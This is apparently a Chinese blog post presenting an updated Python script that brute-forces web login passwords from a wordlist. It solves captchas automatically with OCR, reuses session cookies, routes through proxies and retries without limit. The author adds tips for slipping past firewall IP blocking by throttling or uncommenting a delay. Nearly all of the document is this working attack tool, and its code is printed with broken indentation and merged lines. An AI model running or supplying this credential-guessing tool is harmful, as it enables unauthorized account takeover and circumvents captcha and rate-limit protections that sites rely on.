吐槽: 一个验证码识别,已经发第三篇文章了,水文水的真严重 [aru_2]
作者:我也不想啊,今年都没发几篇文章,而且追求完美的我是真的感觉之前的脚本还存在问题拉~[aru_19]
镇图
说明
- 显而易见,进行了颜色显示美化。
- 对传参进行了优化,命令不像之前那么脓肿麻烦了,如:
- 设置多个自定义请求头:
-lh "xx:xx" -lh "aa:aa"
- FORM 数据类型数据包传参:
-d "username=bWTdXxa2Sm16K1bZ&code=mrwu_yzm&password=mrwu_pass&ggcode="
- JSON 数据类型数据包传参:
--data "{\"username\":\"bWTdXxa2Sm16K1bZ\",\"password\":\"mrwu_pass\",\"code\":\"mrwu_yzm\"}"
- 设置多个自定义请求头:
- 弃用多线程改为携程,感觉携程更加轻量快速一些。
- 对整个代码进行很大的重写和优化,之前版本的可能偶尔蹦出来些小BUG,这个版本应该么得那些问题了。
- 关于速度方面,已经尽力优化了,尝试了许多方法,感觉是因为第三方验证码识别库拉低了速度,暂时没想到好的方法....
- 如果遇到防火墙拦截频繁请求拉IP的目标,可以将线程改低,还是不行的话,可以将 210 行 前面的#注释符删除掉即可延迟规避防火墙。
- 注意:自定义请求头中不能加入Cookie 头,否则会验证码错误,脚本是在请求验证码的同时就已经将获取到的cookie给截取使用了,所以完全没必要在设置cookie。
- 第 141 行代码中的验证码三个字为 验证码错误的关键词后面是响应状态码,如果遇到哪怕验证码正确,响应包中也包含验证码这个关键词的话,可以自己找关键词替换进去,又或者直接注释掉这2行代码,否则可能会无限请求爆破。
- Python 版本最好是 3.7.0 以上,我自己的版本是3.10.0
- 支持无验证码的账号密码爆破,只需要不指定-cu 验证码地址即可,线程数最好别太大,否则容易挂掉或者被拉IP。
- 脚本加入了状态码非 200、301、302 则自动无限重试的功能。
- 任务是异步挂后台运行的,线程多和少最终执行速度取决于各方面因素,所以自己尝试找到最合适的线程数。
- 如果状态码显示-1 可能是请求失败或者请求不完整之类的,脚本会无限重试,如果状态码出现403、500、502之类的,那么就需要人工检查问题出在哪里了。
- 最后,使用脚本之前请先安装加载的第三方库:aiohttp,asyncio,argparse,ddddocr,imghdr,tqdm
代码-更新时间(2023 7/26 17.30)------ 【时常改动代码,请自行对比时间更新自己的代码】
import aiohttp,json,asyncio,argparse,ddddocr,imghdr,sys,datetime,urllib.parse
from tqdm import tqdm
def banner():
print('''
_ _
| | | |
___ __ _ _ __ | |_ | | __ _ __ _ ___
/ __/ | '_ \| __/ __| '_ \ / _
| / ` |/ _ \
| (| (| | |) | || (| | | | (| | | (| | () |
__,| ./ || ||,| , |/
| | / |
|| |/
Author:MrWu feedback:https://mrwu.red/fenxiang/4090.html
Update Time:2023 7/26 17.30
Tips :
1.验证码错误、无法访问、请求超时等失败的请求会自动重试!
2.可以通过 -x 排除不需要回显的状态码、响应结果关键词来让结果更加清晰,多个排除使用空格分割!
3.验证码和登录均支持自定义请求头,可以使用多个参数形式来添加多个请求头: -lh "xx:xx" -lh "aa:aa"!
4.如数据类型是JSON数据,使用反斜杠转义双引号:--data "{"username":"admin","password":"mrwu_pass","code":"mrwu_yzm"}"
''')
#日志保存
def save(data):
f = open('log.txt', 'a',encoding='utf-8')
f.write(data + '\n')
f.close()
#命令行参数
def parse_arguments(argv):
parser = argparse.ArgumentParser()
`# 添加命令行参数
parser.add_argument('-lu', '--login_url', default='', required=True, help="登录提交地址", type=str)
parser.add_argument('-cu', '--captcha_url', default='', help="验证码地址", type=str)
parser.add_argument('-ch', '--captcha_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="验证码请求头")
parser.add_argument('-lh', '--login_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="登录请求头,必须带上数据类型(application/json 或 application/x-www-form-urlencoded)。")
parser.add_argument('-d', '--data', default='', required=True, help="1.登录提交的数据包,mrwu_pass 替换密码值,mrwu_yzm 替换验证码值。 2.如果是JSON数据类型,请给双引号加上反斜杠转义符。", type=str)
parser.add_argument('-f', '--file', default='', required=True, help="密码字典路径", type=str)
parser.add_argument('-x', '--xxx', nargs='+', default=[], help="排除的响应包大小回显,多个空格分割")
parser.add_argument('-t', '--thread', type=int, default=10, help="指定线程数")
parser.add_argument('-p', '--proxy', type=str, default='', help="代理格式: 协议:IP:端口 如:socks5://127.0.0.1:1080")
解析命令行参数
args = parser.parse_args(argv)
处理 captcha_header
captcha_headers = {}
if args.captcha_header:
for header in args.captcha_header:
key, value = header.split(':')
captcha_headers[key.strip()] = value.strip()
处理 login_header
login_headers = {}
if args.login_header:
for header in args.login_header:
key, value = header.split(':')
login_headers[key.strip()] = value.strip()
返回解析结果
return args.login_url, args.captcha_url, captcha_headers, login_headers, args.data, args.file, args.xxx, args.thread, args.proxy
`
#字典
def open_data(txt):
data_list = []
try:
with open(txt, 'r', encoding='utf-8') as f:
for line in f:
try:
处理每一行的内容
data_list.append(line.replace("\n", ""))
except Exception:
tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 读取文件异常,进行重试...\033[0m")
data_list = open_data(txt) # 递归调用 open_data() 函数进行重试
break
return data_list
except FileNotFoundError:
exit(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 加载字典失败,请检查路径是否有误!\033[0m")
async def _ocr(img):
try:
if imghdr.what(None, img) is not None:
ocr = ddddocr.DdddOcr(show_ad=False)
res = await asyncio.to_thread(ocr.classification, img)
return res
except Exception as e:
exit(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 验证码识别发生错误:\033[0m {e}")
async def captcha(params):
headers = params['param3']
proxies = params['param5']
url = params['param2']
`try:
async with aiohttp.ClientSession() as session:
async with session.get(url, headers=headers, proxy=proxies, timeout=3, ssl=False) as response:
captcha_text = await response.read()
cookies = response.headers.getall('Set-Cookie')
if cookies and captcha_text:
return cookies, captcha_text
else:
return -1
except ConnectionResetError as e:
tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... \033[0m")
await asyncio.sleep(3)
return -1
except Exception as e:
return -1
async def login(data, cookie, params): url = params['param1'] proxies = params['param5'] headers = {"Cookie": "; ".join(cookie)}
if params['param4']:
headers.update(params['param4'])
try:
async with aiohttp.ClientSession() as session:
async with session.post(params['param1'], data=data, headers=headers, proxy=params['param5'], timeout=3, ssl=False) as response:
login_text = await response.text()
if login_text and response.status:
return response.status, login_text
else:
return -1
except ConnectionResetError as e:
tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... \033[0m")
await asyncio.sleep(3)
return -1
except Exception as e:
return -1
def login_results(pwd,result): status_code, response_text = result
if "验证码" in str(response_text) or str(status_code) not in ['200', '301', '302']:
return -1
res = [ele for ele in params['param7'] if (ele in str(response_text) or ele in str(status_code))]
if not res:
if len(str(response_text)) <= 150:
tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[92m[INFO] \033[96m状态码:\033[0m{str(status_code)} \033[96m密码:\033[0m{pwd} \033[96m结果:\033[0m{str(response_text)}")
else:
tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[92m[INFO] \033[96m状态码:\033[0m{str(status_code)} \033[96m密码:\033[0m{pwd} \033[96m结果:\033[0m 响应结果太大请查看log.txt文件!")
save("密码:%s 结果:%s\r" % (pwd, str(response_text)))
return str(status_code)
async def run(pwd, params): if params['param2']: #验证码请求 captcha_task = asyncio.create_task(captcha(params)) captcha_result = await captcha_task
if captcha_result == -1:
return -1
#验证码识别
img_task = asyncio.create_task(_ocr(captcha_result[1]))
img_result = await img_task
#登录请求
data = params['param6'].replace('mrwu_pass', urllib.parse.quote(pwd)).replace('mrwu_yzm', img_result)
login_task = asyncio.create_task(login(data, captcha_result[0], params))
else:
#登录请求
data = params['param6'].replace('mrwu_pass', urllib.parse.quote(pwd))
login_task = asyncio.create_task(login(data, '', params))
login_result = await login_task
if login_result == -1:
return -1
return login_results(pwd,login_result)
async def execute_tasks(thread, task_list, params): pbar = tqdm(total=len(task_list), desc='\033[94m任务', mininterval=0.3, bar_format=' {l_bar}{bar}| [\033[0m\033[91m{n_fmt}\033[94m/\033[0m\033[91m{total_fmt}\033[0m\033[94m] , [\033[0m\033[91m{rate_fmt}\033[0m\033[94m] , [用时:\033[0m\033[91m{elapsed}\033[0m\033[94m] , [预估完成时间:\033[0m\033[91m{remaining}\033[0m\033[94m]{postfix}')
async def process_task(pwd):
while True:
try:
result = await run(pwd, params)
pbar.set_postfix_str('[状态码:\033[0m\033[91m' + str(result) + '\033[0m\033[94m]\033[0m')
if result != -1:
break
except Exception as e:
break
pbar.update(1)
async def run_tasks():
tasks = {process_task(pwd) for pwd in task_list[:thread]}
while tasks:
completed, tasks = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
for task in completed:
await task
if len(task_list) &gt; thread:
new_task = task_list.pop(thread)
tasks.add(asyncio.create_task(process_task(new_task)))
#await asyncio.sleep(0.5) # 添加延迟时间,如果需要则取消注释即可。
try:
await run_tasks()
finally:
pbar.close()
if name == "main": banner() cmd = parse_arguments(sys.argv[1:])
# 传递参数构造
params = {
'param1': cmd[0],
'param2': cmd[1],
'param3': cmd[2],
'param4': cmd[3],
'param5': cmd[8],
'param6': cmd[4],
'param7': cmd[6]
}
passlist = open_data(cmd[5])
启动
loop = asyncio.get_event_loop()
loop.run_until_complete(execute_tasks(cmd[7], passlist, params))
print(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[OK] 全部任务已完成!\033[0m")
`